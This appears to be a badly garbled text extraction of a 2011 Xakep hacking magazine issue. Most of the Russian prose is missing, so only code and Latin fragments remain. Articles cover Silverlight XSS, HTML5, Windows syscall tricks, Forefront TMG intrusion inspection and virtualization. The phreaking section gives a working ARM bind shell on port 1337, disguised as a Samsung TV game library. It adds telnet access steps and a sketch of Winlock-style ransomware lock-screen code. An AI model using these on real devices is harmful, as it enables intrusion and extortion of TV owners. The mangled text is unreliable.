- , ).
trusted-,
104
Silverlight Code
2. clientaccesspolicy.xml ,
Silverlight:
SecurityCritical Code
:
COM-;
/ ;
.
trusted Silverlight-
, , , ,
.

Silverlight-
JavaScript + HTML, Silverlight cross site scripting (XSS) ,

, -. XSS ,
-.
XSS HTML/JavaScript- , .
XSS- Silverlight- ,
, HTML/JavaScript.
XSS - , HTML. Silverlight- HTML-
XAML- , ,

mybox.Text = badString;
XamlReader.Load("<TextBlock.Text= " + badString + "/>".

X 06 /149/ 2011
http://foo.com
http://api.cool.com
http://foo.com/app.xap
, XSS- , SL- :
XamlReader.Load() ;
Assembly.Load() c Dll, ;
SL-
XAML- HTML- System.Windows.Browser;
SL- xap-
.
xap- . Silverlight-
, managed- , native-.
.
, XSS GIFAR-,
- ,
Silverlight , Silverlight-
Silverlight-
MIME Type application/x-silverlight-app.
, , .xap-
heap-spray ,
. native-,
, xap-, heap-spray
web-.
Silverlight-
?
Silverlight-,
, EnableHtmlAccess object,
Silverlight-. ,
SL- HTML- JavaScript.
true,
X 06 /149/ 2011
, false .
, Silverlight-
,
:
if (App.Current.Host.Settings.EnableHTMLAccess == false)
throw new Exception();
string htmlurl = System.Windows.Browser.HtmlPage.Document.
DocumentUri.ToString();
if (htmlurl != "http://my.com/my.html")
throw new Exception();
Silverlight- ,
:
(, )
Silverlight-, , , SQL ;
-
( referer Silverlight 4.0).
, . , IS
. , IS
. , -
DNS , .
IS XSS .
Silverlight- , , , , .
Silverlight-, ,
web-
. z
105
CODING

HTML5
HTML5

, ?
,
HTML5.
HTML5-,
.
HTML5?
HTML5 .
. HTML5 CSS3
,
web- .
JavaScript. API,
HTML5. , : HTML5
/ (JS, HTML5, CSS3 ),
web-.
HTML5 .
2007 .
W3C. HTML5
Web Application 1.0,
2004 . HTML5
, .
HTML5
22 2008 . ,
.
. , (FireFox
106
4, Google Chrome 10, IE9, Opera 11)

.
HTML5 , , . , ,

. , .
1: Drag&Drop
(,
, . .)
HTML5 File API Drag and Drop API.

. ,
Browse?
, .
.
.
,
, X 06 /149/ 2011
?
,

HTML5.
. :
, HTML5
?. ,
JavaScript-
Modernizr (modernizr.com).
,
HTML5,
.
,
.
, ,
. Google
Chrome Internet Explorer 9. pr-
, Microsoft
, Google Chrome.
. ,

.
Drag&Drop
.
. ,
.
HTML5 , Drag&Drop .
Gmail. , ,
.
, .
: sample.html, style.css scripts.js. , ,
html-,
. HTML JS CSS.
, .
.
sample.html :
<!DOCTYPE html>
<html>
<head>
<link type="text/css" rel="stylesheet"
media="all" href="style.css" />
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="scripts.js"></script>
</head>
<body>
X 06 /149/ 2011
HTML5 FLASH
HTML5
. HTML5 CSS3.

Flash. ,
, Flash ,
HTML5/CSS3- (). ,
.

, .
, Canvasa: feedtank.
com/labs/html_canvas;
3D- Google:
addyosmani.com/resources/googlebox;
, .
.
. : mrdoob.
com/projects/chromeexperiments/ball_pool;
,
. : alteredqualia.
com/canvasmol;
-
? ,
. Google
WebGL, HTML5, CSS3 Flash.
, 3D- ,
.
. :
bodybrowser.googlelabs.com.
<div id="box"><span id="label"> </span>

</div>
</body>
</html>
JavaScript
jquery. html-.
,
.
div-. ,
.
, CSS.
style.css :
#box {
width: 500px;
height: 300px;
border: 2px dashed #000000;
background-color: #FCFFB2;
text-align: center;
color: #3D91FF;
font-size: 2em;
font-family: Verdana, sans-serif;
107
CODING
HTML5

-moz-border-radius: 8px;
-webkit-border-radius: 8px;
}
#label {
position: relative;
top: 2%;
}
box
(
). ,
dashed
. ,
: -moz-border-radius -webkitborder-radius.
.
- , .
web-, .
JavaScript:
$(document).ready(function() {
//
var mybox = document.getElementById("box")
mybox.addEventListener("dragenter", dragEnter, false);
mybox.addEventListener("dragexit", dragExit, false);
mybox.addEventListener("dragover", dragOver, false);
mybox.addEventListener("drop", drop, false);
});
function dragEnter(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function dragExit(evt) {
}
function dragOver(evt) {
}
function drop(evt) {
var files = evt.dataTransfer.files;
var count = files.length;
if (count > 0)
108
handleFiles(files);
}
function handleFiles(files) {
//
//
//,
var file = files[0];
document.getElementById("label").innerHTML =
": " + file.name;
var reader = new FileReader();
reader.onprogress = handleReaderProgress;
reader.readAsDataURL(file);
}
function handleReaderProgress(evt) {
if (evt.lengthComputable) {
if (evt.loaded = evt.total) {
alert("...");
}
}
}
,
, JavaScript jquery,
. ,
. . , dragExit ,
,
.
, handleFiles().
(files[0])
. ,
.
, files. handleFiles() .
label (
?) , ,
FileReader(). :
html5rocks.com/tutorials/file/dndfiles.
onProgress FileReader().
, . :
, , , .
2: , ,
HTML5 web
flash-. ,
. X 06 /149/ 2011
GAPI.
:

( Flash Player )
. HTML5
- -.
, , <audio>
<video>. -
. , . ,
, ,
Chrome,
FireFox . ,
Flash-. (, - ,
- . ) ,
.
:
<!DOCTYPE html>
<html><body><video src="video-for-sample-1.mp4"
poster="screen-for-sample1.jpg" controls>
. ,
.
</video></body></html>
, <video>
poster. ,
.
? , /.
<audio> .
. ,
(ogg,
mp3). mp3,
ogg. ,
, .
3: Where are you now

(geolocation API)
Geolocation API .
, , Google Maps. ? ! ,
Twitter Geolocation
API web- -.
,
, .
, : GAPI ?. ,
- .
IP-, Wi-Fi , GPS (
), GSM cell ID .
, ][
Step , , .
X 06 /149/ 2011
<!DOCTYPE html>
<html>
<body>
<script language="JavaScript">
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(
function (position) {
document.getElementById("latitude").innerHTML =
position.coords.latitude;
document.getElementById("longitude").innerHTML =
position.coords.longitude;
},
);
}
</script>
<div id="coords">: <span id="latitude">Unknown</span>
<br />: <span id="longitude">Unknown</span><br />
</div>
</body>
</html>
, ,
GAPI. geolocation true,
. getGurrentPosition
navigator. , .
4:
web-
. MySQL, SQLite , . HTML SQLite . !
, ?
, . , .
.
, .
, IE9 FF4 , Google Chrome.
,
:
this.db = openDatabase("xakep", "1.0", "test", 8192);
tx.executeSql("create mytable if not exists " +
"checkins(id integer primary key asc, field_number_one string)",
[], function() { console.log(" "); });
);
,
,
, SQLite: ,
.
HTML5.Shutdown()
HTML5 . ,
.
, HTML5-
. ,
, ,
. ( ).
,
. ! z
109
CODING
(stannic.man@gmail.com)
,

TLS
, , . !
(
:)), .
#1,
El pueblo unido jamas sera vencido!
, ? Windows
( ) , ,
, .
.

Windows ******, . ,
,
, ,
. WinAPI- RtlAdjustPrivilege,
AdjustTokenPrivileges . , WinAPI
ExitWindowsEx() ,
, ( ):
VOID sutdownSystem()
{
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{...}
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);
if (!ExitWindowsEx(...))
{...}
}
, Windows (
) , ,
: -
110
!

( ) , . , Windows Vista
.
.
, , ,
? :). , :
, , . , , , , ,
.
?, . , , . ,
!
, ,
kernel32.dll ntdll.dll, . , kernel32.
dll ntdll.dll . ,
: kernel32!CreateFileW
ntdll!NtCreateFile [ INT 0x2e] ntos!ZwCreateFile (...).
,
Nt*-
INT 0x2e
kernel32!CreateFileW ntdll!NtCreateFile. , ,
INT 0x2e, .
,
! , INT 0x2e
Windows 2000. WinXP SYSENTER, INT 0x2e
.
, , :
__declspec(naked) NTSTATUS __cdecl NtCallStub(
__in ULONG SdtNumberOfFunc, ...)
X 06 /149/ 2011
{
__asm
{
mov eax, [esp+4]
lea edx, [esp+8]
int 0x2e
ret
}
}
// SdtNumberOfFunc Nt*-
// SSDT

NT*- RtlAdjustPrivilege. ?
. , x64- ,
SYSENTER (,
,
SYSENTER).
INT 0x2e :

. , , -
WinAPI NtCreateKey().
ntdll.dll, (,
). ,
, NtCreateKey X 06 /149/ 2011
INT 0x2e .
ZwCreateKey,
. ,
ntdll.dll!NtCreateKey,
. - , , NtCreateKey, ,
- ,
.
, ,
ntdll.dll!NtCreateKey INT 0x2e. ,
-,
, -
API NtCreateKey()
,
.
,
INT
0x2e ( SYSENTER).
, .
#2,

,
( ,
, )
,
DVD
dvd
DVD

,

.
HTTP://WWW
links
ReactOS
(
Windows):
alex-ionescu.com
111
CODING
.
,
JUMP --.
if( threadHandle = OpenThread(THREAD_GET_CONTEXT, FALSE,
currThreadEntry.th32ThreadID ) )
{
StartAddress = GetThreadStartAddress( threadHandle );
if( ( StartAddress < 0x00401000 ||
StartAddress > 0x0040156B ) && StartAddress < 0x70000000 )
{
//
}
else
{
NtGetContextThread( threadHandle, &ctx );
if( ( ctx.Eip < 0x00401000 || ctx.Eip > 0x0040156B )
&& ctx.Eip < 0x70000000 )
//
}
NtClose( threadHandle );
}
NtGetContextThread
INT 0x2e .
, ,
. , ,
INT 0x2e.
#3
malloc/realloc
, malloc ExAllocatePool,
, realloc .
112
? malloc/realloc,
ExAllocatePoolWithTag (
ExAllocatePool, MSDN, ,
ExAllocatePoolWithTag).
VOID * malloc(ULONG size)
{
PVOID data = 0;
data = ExAllocatePoolWithTag(PagedPool, size, "Tag");
memset(data, 0x0, size);
return data;
}
, , realloc:
VOID * realloc(PVOID memPtr, ULONG size, ULONG oldSize)
{
PVOID newPtr = 0;
newPtr = ExAllocatePoolWithTag(PagedPool, size, "Tag");
if( !newPtr )
return 0;
if ((oldSize) && (memPtr))
{
RtlMoveMemory( newPtr, memPtr, oldSize);
ExFreePool(memPtr);
}
return newPtr;
}
, , ,
, , .
! z
X 06 /149/ 2011
SYN/ACK

TMG 2010
TMG, NIS, GAPA

, . ,
, .
.

, .
, TMG 2010.
TMG 2010
ISA 2006 TMG (Threat Management Gateway) 2010

Forefront, . TMG

. TMG 2010 , VPN,

URL-.
ISA? TMG 64- ,
Windows Server 2003 . TMG .
TMG ,
, ISA 2006,
, ,
(. 1).
, web-
(. 2). Web
Access Policy HTTPS.
SSL-, SSL bridging. HTTPS inspection (. 2)
,
Man-in-the-middle.
(HTTPS inspection
certificate),
. HTTPS inspection SSTP-
.
, HTTPS inspection
Extended Validation (EV) SSL,
114

.
E-Mail Policy -
.
SSTP.

(. 3), IP- ,
Behavioral
Intrusion Detection (. 4). ISA 2006 IPv6 TMG
Direct Access.
SIP (Session Initiation Protocol). ,
Intrusion Prevention System
Network Inspection
System (NIS).
(Intrusion-Detection System
IDS) ( ), ,
,
.
(Intrusion Prevention Systems IPS),
IDS, ,
.
IDPS , ,
. IDPS (Network Based IDPS
NIDPS)
. IDPS (Host Based
IDPS HIDPS) (
), ,
.
IDPS ,
. Anomaly Based IDPS Policy Based IDPS
,
X 06 /149/ 2011
TMG
NIS
GAPA

1. NIS Guide to Configuring, Monitoring, and Troubleshooting the Network Inspection System (NIS)
in Forefront Threat Management Gateway (TMG) 2010:
download.microsoft.com;
2. ,
NIS:
technet.microsoft.com/en-us/library/ff382649.aspx;
3. GAPA GAPAL,
:
research.microsoft.com/pubs/70223/tr-2005-133.pdf;
4.
Forefront Edge:
technet.microsoft.com/en-us/library/cc891502.aspx;
5. Microsoft Malware Protection Center (MMPC):
microsoft.com/security/portal;
6. SDK TMG 2010:
microsoft.com/downloads/en/details.aspx?displaylang=en&Family
ID=8809cfda-2ee1-4e67-b993-6f9a20e08607.
, IT-Academy
& Softline
Microsoft Certified Professional (MCP)
Microsoft Certified Systems Administrator:
Security (MCSA: Security)
Microsoft Certified Systems Engineer: Security
(MCSE: Security)
Microsoft Certified Technology Specialist: Windows Server 2008
Active Directory, Configuration; Windows Server 2008 Network
Infrastructure, Configuration
Microsoft Certified Trainer (MCT)
Oracle Certified Associate (OSA)
Oracle Certified Professional (OCP)

, . 80%
,
, .
Network Inspection System (NIS)
NIS Generic Application

Level Protocol Analyzer (GAPA), Microsoft Research
(MSR). GAPA
GAPA Language (GAPAL),
.
NIS (IDS) . IDPS (, ++), GAPA

.
NIS IPS,
. , X 06 /149/ 2011
, ,
. ,
, ,
,
.
, NIS
. ,
NIS ,
Microsoft. , NIS
web-, .
TMG Malware Inspection.
NIS : HTTP, DNS,
SMB, MSRPC, SMTP, POP3, IMAP, MIME.

, . ,
,
(. 5). , ,
NIS User
Defined Protocol ,
115
SYN/ACK
. 1. Forefront TMG Management

NIS. NIS ,
Firewall policy.
, (.
6). Allow, to avoid blocking legitimate
traffic , ,
.
,
.
RFC,
Block, to tighten
security.
NIS
TMG 2010 .
Preparation Tool, (, .Net Framework 3.5.1),
Installation Wizard. ,
Getting Started Wizard, No
network adapters could be identified.
, - TMG
. Security
Configuration Wizard (SCW), TMG 2010.
NIS Getting Started Wizard,
Roles Configuration. . 7 ,
NIS . NIS
(. 6).
NIS. NIS
, 30%
. ,
. ,
, ,
. NIS. ,
Domain Name Set, http-.
116
. 2. Web Access Policy

NIS Properties
.
NIS, Other.
Test. Test:Win/NIS.HTTP.Signature!0000-0000 , SecureNAT
TMG, http://www.contoso.com/testNIS.
aspx?testValue=1!2@34$5%6^[{NIS-Test-URL}]1!2@34$5%6^.
NIS
(12234). SMB.
Malware Protection
Center, Details
.

(. 8).
,
NIS.
Firewall Policy (. 9).
X 06 /149/ 2011
. 4. Behavioral Intrusion Detection
. 3.

NIS
: vulnerability based ( ), exploit based ( ) policy

based ( ,
).

. ,
, ,
, .
,
Microsoft Malware Protection Center (MMPC). MMPC , Telemetry Service.
Forefront TMG . Basic
Membership Microsoft
, .
Advanced Membership
URL, .
NIS Properties
Definition Updates, : ( ),
.
, , . Automatic polling
frequency NIS,
TMG Update Center.

,
, VPN. NIS Properties
Response policy .
Microsoft default policy,
, MMPC.
:
(Detect only response), (No response Disable signature). NIS
X 06 /149/ 2011
.5. Network Inspection System

, . Definition
Updates Version Control.
.
.
. ,
, . , . :
Attention Required, Response, Policy Type, Business Impact, Category,
Date Published, Severity, Fidelity, Protocol Status.
.
, , HTTP,
RPC over HTTP. ,
, ,
. ,
, ,
Microsoft Default Policy,
. ,
, NIS
.
(Detect Block) NIS
IDS IPS.
, .
117
SYN/ACK
. 6.
. 8. NIS
. 9. NIS

.

Detect only Forefront TMG Customer Support.
, -
.
MMPC , Telemetry
Service. ,
.
. 7. NIS
118
NIS, , . :
. z
X 06 /149/ 2011
SYN/ACK
grinder (grinder@tux.in.ua)
.
, .
, .
VMware ESXi
, , VMware, . VMware
Workstation VMware Player. MS
Virtual PC Workstation.
- ,
.
VMware ESXi ,
, VMware vSphere (
, . ][ 08.2010). , ESXi
Linux, (VMkernel)
: vCLI (vSphere CLI), PowerCLI (PowerShell
vCLI), SSH DCUI (Direct Console User Interface).
ESXi
VMware,
ESX. ESX , VMware
VSphere ESXi ( VMware vSphere
Hypervisor), ESX ESXi .
ESXi.
ESXi ESX .
ESX Linux, . VMware
COS (Console OS),
. : ~2
350 ESXi ( 70).
ESXi VMkernel,
(, )
.
, .

firmware . -
ESXi (clck.ru/9xlp) ,
ESX, ,
. ,
ESXi Whitebox HCL (clck.
ru/9xnD), VMware ESXi.
,
.
VMware
. Windows, Linux, Solaris,
FreeBSD, Netware , .
ESXi
ESX Active Directory
( ),
(
120
),
VMware vStorage VMFS/Storage VMotion SAN,
, VMsafe Security
API. CPU, , (
).
(
PXE), 4.1 ,
, vCenter Server. VSphere API
ESXi.
VMware
vCenter Converter (vmware.com/products/datacentervirtualization/converter), ESXi
MS Virtual Server, Virtual PC, Hyper-V,
, Acronis True Image, Norton Ghost .
, ESXi
- VMware Go (go.vmware.com), , ESXi
VM.
MS Hyper-V
MS,
2008 . Win2k8R2 Hyper-V
Live Migration, ,
.
Hyper-V
Ring-1.
, . Windows
Server 2k8/R2 ( Server Core)
MS
Hyper-V Server 2008 R2 (microsoft.com/hyper-v-server).
( Client Access License),
Windows. ,
Server Core,
( )
.
, Hyper-V
, .
Live Migration, .
, MS Hyper-V Server,
1 8 CPU, .
32- 64- Windows
XP SP3, Vista SP2/2k3 SP1/2k8 Linux (SLES RHEL). ,
X 06 /149/ 2011
XenServer
XenServer ( 5.6.1) - VMware
ESXi. ,
.
XenCenter,
Citrix.
XenServer .
;
Live Motion; ,
;
(RBAC) Active Directory;
,
RAM VM .
,
,
.
(High
Availability). ,
, .

( , NAS, SAN ).
VMWare VMDK,
MS VHD, VDI, WIM.

Windows, Win2k SP4, Linux (SLES, RHEL/CentOS, Oracle EL, Solaris, Debian).
64 , 256 16
.
, VM

: , , .
X 06 /149/ 2011
*nix Ubuntu, FreeBSD

.
Linux 2.6.32+, Hyper-V
(LinuxIC, MS GPL). ,
Win2k8 4 vCPU.
MS Hyper-V Server x64
CPU, Intel VT AMD-V, 1 RAM.

MS System Center Virtual Machine
Manager 2008 (SCVMM 2008), P2V(Physical to Virtual) V2V- ( VMware).
, P2V Win. , , Linux, : VMware vCenter Converter ESXi
SCVMM Hyper-V. ,
, .
,
. SCVMM
VMDK2VHD (vmtoolkit.com/files), Citrix
XenConvert, Quest vConverter (quest.com/vconverter).
OpenVZ
OpenVZ (OpenVZ.org)
Linux, (Virtual
Environments). , .
Linux.
, .

,
.
( 1-3%).
121
SYN/ACK
AQEMU
CentOS
64 RAM, 4096 CPU
.
(venet), VM
(IP ). , - (
,
) OpenVZ , ,
Linux.
.
( inodes / ),
, VM.
VM.
(Checkpointing),
. ,
.

(download.openvz.org/contrib/template/precreated),
.
OpenVZ vzctl (vzlist, vzmigrate, vzcalc, vzcfgvalidate, vzmemcheck,
vzcpucheck, vzpid, vzsplit ).
, , OpenVZ, KVM Xen ( ) WebVZ (webvz.sf.net), Kloxo ( Proxmox VE) HyperVM.
OpenVZ , Debian.
KVM
KVM (Kernel-based Virtual Machine)

RedHat
.
Intel VT AMD V. , KVM
:
CPU (, Intel Atom) .
,
. :
$ egrep '^flags.*(vmx|svm)' /proc/cpuinfo
GNU GPL, RedHt

Novell .
(kvm.ko) userspace.
122
OpenVZ
QEMU
(qemu.org), . CPU
kvm-amd.ko kvm-intel.ko. /dev/kvm.
,

. - , balloon (
) Virtio,
userspace. , OpenVZ, , , 20%. KVM Linux, *BSD,
Windows, Solaris, Mac OS X .
,
16 vCPU ( , Win XP,
). , ,
Linux,
, .
.
, KVM vmdk-,
VMWare, HOWTO (clck.ru/9xlp).
, KVM Linux
2.6.20 (, ),
.
KVM savevm/loadvm, offline ( migrate*).
( CPU) ,
.
X 06 /149/ 2011
INFO
info
ConVirt
Hyper-V
Win2k8
,
. :
, .
P2V .
dd, QEMU,
.
VMWare Converter.
KVM QEMU (
), (
, ) .
/dev/kvm kvm.
-
virt-manager, RedHat,
qemu* kvm.
(
).
: , Karesansui (Xen/KVM),
Symbolic, ConVirt (Xen/KVM), Ganeti (Xen/KVM).
Xen
90-,

, GNU GPL.
2007 .
XenSource,
Citrix,
Citrix XenServer (CentOS + Xen). , Xen Oracle VM.
Xen, .
Xen Cloud Platform.
Xen ,
()
(HVM, Hardware Virtual Machine)
(PV). , , CPU Intel-VT
AMD-V,
. , Xen
.

, Xen
: x86, x86_64, Itanium, Power PC ARM, Linux, NetBSD FreeBSD.
WinXP, X 06 /149/ 2011
VM Karesansui
. Linux, NetBSD,
FreeBSD, Solaris Windows.

, 8%. Live Migration, ,
,
, VM
(Remus Fault Tolerance), USB-.

,
( ).
4.1 > 255
CPU, 1 RAM, 128 vCPU;
CPU
.
vanilla Linux Xen 2.6.37,
Linux
.

xen-utils, xen-tools, . , ,
virt-manager, AQEMU, OpenQRM, Xen
Orchestra, Zentific, xnCORE .
.
,
.
, .
.
,
OpenSource, . z

VMware vSphere
,
][ 08.2010.
BSOD
Windows, ESXi
PSOD (Purple
Screen of Death).

MS
System Center Virtual
Machine Manager
2008.
Linux
2.6.32
Hyper-V.

, ][ 04.2010.
Citrix
XenServer

, ][
05.2009.
HTTP://WWW
links
VMware:
vmware.ru;
MS
Hyper-V Server 2008
R2: microsoft.com/
hyper-v-server;

OpenVZ: download.
openvz.org/contrib/
template/precreated.
123
SYN/ACK
, c Group-IB
-

.
.
, , .
:
, , ,
.

.
.
.
, , ,
, , . VMware ESX, Citrix
XenServer, Microsoft Hyper-V.
, : VMware Workstation, Oracle Virtual Box
.
,
.
,

(, ][).
,

.
,
(, ) .
, . ,
-,
.
VT-x? VT-d!

Intel. (VT-x)

. (VT-d)
,
,
-.
VT-d
,
.
. -
124
, , .
, .
? , ,
.
Citrix, Xen Client.
2010 ,
,
. ?
,
. .
, . .
,
( ),
,
.

,
.
,
, , , . ,
,
.
,
, , , , ,
,
. Xen Client , ,
citrix.com.
Xen Client . .
Intel VT-d,
Core i5-5xx Core i7,
Sandy Bridge Core i5-25xx.
3D- , ,
( . .),
Intel GMA X4500 Intel GMA HD.
X 06 /149/ 2011
Xen Client
, Xen Client

, , IDS- DLP-.
,
.
Xen Client
.

.
Windows
(XP-Seven),
Linux, Xen Tools. Mac
OS X .
,
.
, ,
. ,
.
ISO , Citrix Synchronizer.
, , .
,

, X 06 /149/ 2011
,
SynAsk

, , -, . ,
-
3-6 . . . . .
. . -
, , IT,
18:00,
,
.

. ?
, ,
,
- .

, ,
, , ;
.
, ,
,
:). .
, .
. .

. -
125
SYN/ACK
!

.
,
, . ,
. , .
.
, Citrix
Synchronizer. Synchronizer,
, ,
. ,
.

.
. ,
USB Wi-Fi. ,
.
, ,
. ,
Xen Client:
1.
, Enterprise-, .
2. .
3.
. ,
,
, ,
.
4. ,
, -
126

.
, , ,
, .
Xen Server ?
: Citrix Receiver. ,
(
, Android iOS). Citrix Receiver
. ,
, Desktop Delivery Controller,
.
Citrix VDA,
X 06 /149/ 2011

Desktop Delivery Controller,
,
. Citrix Receiver,
.
, Microsoft Office 2010
. ,
RDP?
Xen Server Xen
Desktop,
,
, .
Citrix
Citrix XenVault Citrix XenApp.

. ,
. Citrix
XenApp , . .
XenApp 1 ,
, ,
.
, ( ) ,

. Citrix XenVault , .
AES 256- , ,
.
.
. Xen Client, XenVault
, . ,

.

, ,
. ,
,
, .
X 06 /149/ 2011
XenClient
.

,

. .
, :
1.
.
2.
.
3. .
4. .
:
1. .
2. .
3. .
, Citrix. ,
(,
:) . .) ,
. ,

. z
127
PHREAKING
HellMilitia
, ,
.
Samsung LE650B.
GNU/Linux, BusyBox,
, .

,
.
: ,
.
, .
,
Ethernet-. ,
,
. ,
192.168.1.2, 192.168.1.1.
- .
128

nmap:
$ nmap -A 192.168.1.2
Nmap scan report for 192.168.1.2
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.1.2 are closed
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)
OS details: Linux 2.6.14 2.6.16, Linux 2.6.17 (Mandriva)
, ,
:).
TCP- . , UDP- ?
# nmap -sU 192.168.1.2
X 06 /149/ 2011

Nmapscanreportfor 192.168.1.2
Host is up (0.00021s latency).
Not shown: 997 closed ports
PORT
STATE
SERVICE
1024/udpopen|filtered unknown
1026/udpopen|filtered win-rpc
1900/udpopen|filteredupnp
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)
UPnP, -.
HTTP XML .
UPnP DLNA (Digital
Living Network Alliance) ,
- , Wi-Fi/Ethernet
DLNA-.
UPnP , .
GUI
,
:).
, , - ?
, .
:
Samsung
SDK . ,
, e .
, bindshell. Samsung
AppStore. , . :
xml- clmeta.dat manifest-, ; game.so
sharedlibrary, .
.
, :
$ file game.so
game.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV),
X 06 /149/ 2011

dynamically linked, not stripped
ARM! , .
, objdump,
Game_Main, , , . -
, ,
.
(FAT32) , ,
ContentLibrary. ContentLibrary:
, ,
. , .
-.
Bindshell , ,
sharedlibrary Game_Main().
-
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/ip.h>
extern Game_Main;
void Game_Main()
{
int icmp_sock, shell_sock, cli;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(1337);
shell_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
bind(shell_sock, (structsockaddr *)&sin, sizeof(sin));
listen(shell_sock, 1);
cli = accept(shell_sock, NULL, 0);
dup2 ( cli, 0 );
dup2 ( cli, 1 );
129
PHREAKING

,
,
. ,
3.5- . , -,
, RS-232.
:
.
1. .
2.
.
3. usb, (
usb-flash ): /lib/modules/rc.local.
NAND- rfs:
# insmod /lib/modules/fsr.ko
# insmod /lib/modules/rfs.ko
# insmod /lib/modules/fsr_stl.ko
, : bml.erase /dev/bml0/5.
, , : bml.restore /dev/bml0/5 /
dtv/usb/sd1/Image.img.
u-boot.

u-boot.
,
[INFO] [MENU] [MUTE] [POWER]. -

/dev/bml0/3
/dev/bml0/4
/dev/bml0/5
/dev/bml0/6
/dev/bml0/7
uboot_env.bin
fnw.bin
Image
rootfs.img
boot.img
Control Suboption Rs232 jack

Debug, Control Suboption Watchdog -
. ,
. -
u-boot.
, Hit any key to stop autoboot.
0, .
help.
e FAT32;
usb- : bbmusb.
/update;
e :
, kernelimage (4). ,
( Image),
/dev/bml0/1 onboot.bin
/dev/bml0/2 u-boot.bin
dup2 ( cli, 2 );
execl ( "/bin/sh", "sh", NULL );
}
:
arm-linux-gccbindshell.c -fPIC -shared -o game.so
130
. , .
-
game.so ( ) clmeta.dat
( ).

. -
X 06 /149/ 2011
mount

1337 . - :
, .
, ,
:
$ telnet 192.168.1.2 1337
, ,
busybox
. busybox, help, , vi.
mtd_*-:
flash-.
:
# cat /proc/version
[28_64_512] Linux version 2.6.18_SELP-ARM (ksh921@sp) (gcc
version 4.2.0 20070514 (GPL2) (SELP 4.2.0-3.0.5.custom 200710-31(14:53))) #81 PREEMPT Mon Jun 22 10:10:31 KST 2009
passwd:
# cat /etc/passwd
root::0:0:Root,,,:/:/bin/sh
# dmesg
:
<5>CPU: ARMv6-compatible processor [410fb767] revision 7
(ARMv6TEJ), cr=00c5387f
<4>Machine: Samsung-SDP83 Eval. Board(64bit 512MB)
<6>SDP83 Core Clock: 600.0Mhz
<6>SDP83 DDR2 Clock: 399.937Mhz
e : ARMv6 600Mhz, DRRII 400Mhz 512MB.

TEJ :
T: THUMB- . 16 ( 32).
.
E: Enhanced DSP instructions.
J: Jazelle DBX (Direct Bytecode eXecution) , ARM Java -. ,
- . -
df
X 06 /149/ 2011
131
PHREAKING
Java-.
, exeDSP .
:
:
$ unsquashfsrootfs.img
# lsmod
rt73
rt2870sta
usb_storage
ohci_hcd
ehci_hcd
usbcore
usb_fault
8139too
samdrv
rfs
fsr_stl
fsr
354092
674644
37796
18692
29992
129064
4380
23296
3875988
71688
251448
257756
0xbf531000
0xbf48b000
0xbf480000
0xbf47a000
0xbf471000
0xbf450000
0xbf44d000
0xbf446000
0xbf092000
0xbf07f000
0xbf040000
0xbf000000
: 2 Wi-Fi Samsung.
, . usb; ; samdrv
;
Samsung, fsr* .
mount, df /sbin/
update.sh,
:
/dev/tbml6, squashfs, ro, / ;
/dev/tbml7, squashfs, ro, /mtd_boot MinicomCtrl, ;
/dev/tbml8, rfs, ro, /mtd_exe ,
exeDSP, samdrv.ko,
;
/dev/tbml9 squashfs, ro, /mtd_appdata
;
/mtd_tlib MediaContent , ;
/mtd_down ;
/dtv/usb/sd* usb-flash.
, : squashfs rfs. Squashfs
ReadOnly,

, ,
.
, . :
# cat /dev/tbml6 > /dtv/usb/sda/rootfs.img
,
. , :
/mtd_exe/GAME_LIB/ SDL-,
\;
/mtd_exe/InfoLink/keyconfig ,
;
/mtd_appdata/resourse (on.mp3), (off.mp3), (factory_reset_bell.
mp3) , (self.mp3).
132
/mtd_exe? RFS
FAT16, ,
:
$ mkdirmtd_exe
$ mount mtd_exe.img ./mtd_exe -o loop
$ ls -la mtd_exe

: ,
/ (/mtd_appdata/resourse)
(/mtd_exe/InfoLink/
keyconfig).
,
. , . ,
? :
1.
Winlock. ,
SMS,
.
, .
: ,
sms XXXX. ,
.
2.
adware, ,
.
3. DDoS/-

Linux. , ,
, DDoS- .
, . :
.
SDL.
.
RO-, .
.
, game.so, wrapper
, ,
.
, . ,
fork 2 : ,
. :
#define VIDEO_X
#define VIDEO_Y
#define VIDEO_BPP
1920
1080
32
X 06 /149/ 2011
UPnP-Inspector
#define SCREEN_FLAGS
return 0;
}
SDL_BlitSurface(image, NULL, screen, NULL);
return 1;
...
flog = fopen("/dev/kmsg", "a+");
...
}
int init_video(void)
{
if(SDL_Init(SDL_INIT_VIDEO) == -1 )
{
printf(flog, "Fail with SDL_Init: %s.\n", SDL_GetError());
return 0;
}
atexit(SDL_Quit);
if(!(screen = SDL_SetVideoMode(VIDEO_X, VIDEO_Y,
32, SCREEN_FLAGS)))
{
fprintf(flog, "Fail with SDL_SetVideoMode: %s.\n",
SDL_GetError());
return 0;
}
return 1;
}
,
SMS.... , e .
:
int draw_image()
{
if(!(image = SDL_LoadBMP("/mtd_down/locker/fuckup.bmp")))
{
printf("Fail with LoadBMP: %s.\n", SDL_GetError());
X 06 /149/ 2011
SDL_BlitSurface() . .
, .
Internet@TV
Internet@TV -: AccuWether, Youtube, Twitter,

Facebook. Twitter: ,
.
Twitter, , , .
/mtd_down/common, WidgetMgr. cpdata1.dat
localId.dat. ,
:
# cat localId.dat
hm
1111 cpdata1.dat
# cat cpdata1.dat
Twitter HellMilitiaFuckUAll
: localId
e , .
login:pin:passwd_file.
c pdataN ( N e ,
),
. ,
-. z
133
UNITS
(oriyana@xpsycho.ru)
(andrushock@real.xakep.ru)
PSYCHO:

,
IQ,
100% . , ?
, , , ? . ? , , .
,
,
, , ,
, .
,
100%, - 7-10%, .
, , ,
, .
,
.

.
, .
,
,
, , .
